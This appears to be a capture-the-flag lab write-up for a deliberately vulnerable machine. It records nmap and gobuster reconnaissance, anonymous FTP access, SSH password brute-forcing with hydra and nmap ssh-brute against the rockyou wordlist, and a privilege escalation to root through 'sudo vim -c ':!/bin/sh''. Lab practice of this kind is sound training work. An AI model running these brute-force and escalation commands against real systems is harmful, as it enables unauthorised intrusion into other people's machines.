Nmap

$ nmap -A 10.10.192.126 -v

PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.4.5.126
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 2 disallowed entries 
|_/ /openemr-5_0_1_3 
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 29:42:69:14:9e:ca:d9:17:98:8c:27:72:3a:cd:a9:23 (RSA)
|   256 9b:d1:65:07:51:08:00:61:98:de:95:ed:3a:e3:81:1c (ECDSA)
|_  256 12:65:1b:61:cf:4d:e5:75:fe:f4:e8:d4:6e:10:2a:f6 (ED25519)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Gobuster

$ gobuster dir -u 10.10.192.126 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
/simple (Status: 301)

/simple

https://s3-us-west-2.amazonaws.com/secure.notion-static.com/ab3099a4-87a8-4c70-88b4-0f2dea4b7981/Untitled.png

Searchsploit

$ searchsploit vsftpd
# 2.X only

$ searchsploit apache 2.4
# a few but not match challenge CVE

$ searchsploit openssh 7.2p2
# username enumeration

$ searchsploit cms made simple 2.2
# CMS Made Simple < 2.2.10 - SQL Injection | php/webapps/46635.py
$ searchsploit -x php/webapps/46635.py > 46635.py
# find CVE
# edit file for Python3
# didn't seem to work

FTP

ftp 10.10.192.126
Connected to 10.10.192.126.
220 (vsFTPd 3.0.3)
Name (10.10.192.126:kalaratri): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 Aug 17  2019 pub
226 Directory send OK.
ftp> cd pub
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 ftp      ftp           166 Aug 17  2019 ForMitch.txt
226 Directory send OK.
ftp> get ForMitch.txt
local: ForMitch.txt remote: ForMitch.txt
local: ForMitch.txt: Permission denied

SSH

$ nmap 10.10.192.126 -p 2222 --script ssh-brute --script-args userdb=mitch,passdb=/usr/share/wordlists/rockyou.txt -vvv
PORT     STATE SERVICE      REASON
2222/tcp open  EtherNetIP-1 syn-ack
| ssh-brute: 
|   Accounts: 
|     mitch:secret - Valid credentials

# or
$ hydra -l mitch -P /usr/share/wordlists/rockyou.txt ssh://10.10.192.126:2222 -v -t4
[2222][ssh] host: 10.10.192.126   login: mitch   password: secret

$ ssh [email protected] -p 2222
$ ls
user.txt
$ cat user.txt
G00d j0b, keep up!
$ ls /home
mitch  sunbath
$ sudo -l
User mitch may run the following commands on Machine:
    (root) NOPASSWD: /usr/bin/vim

# <https://gtfobins.github.io/gtfobins/vim/>

$ sudo vim -c ':!/bin/sh'
# whoami
root
# ls /root
root.txt
# cat /root/root.txt
W3ll d0n3. You made it!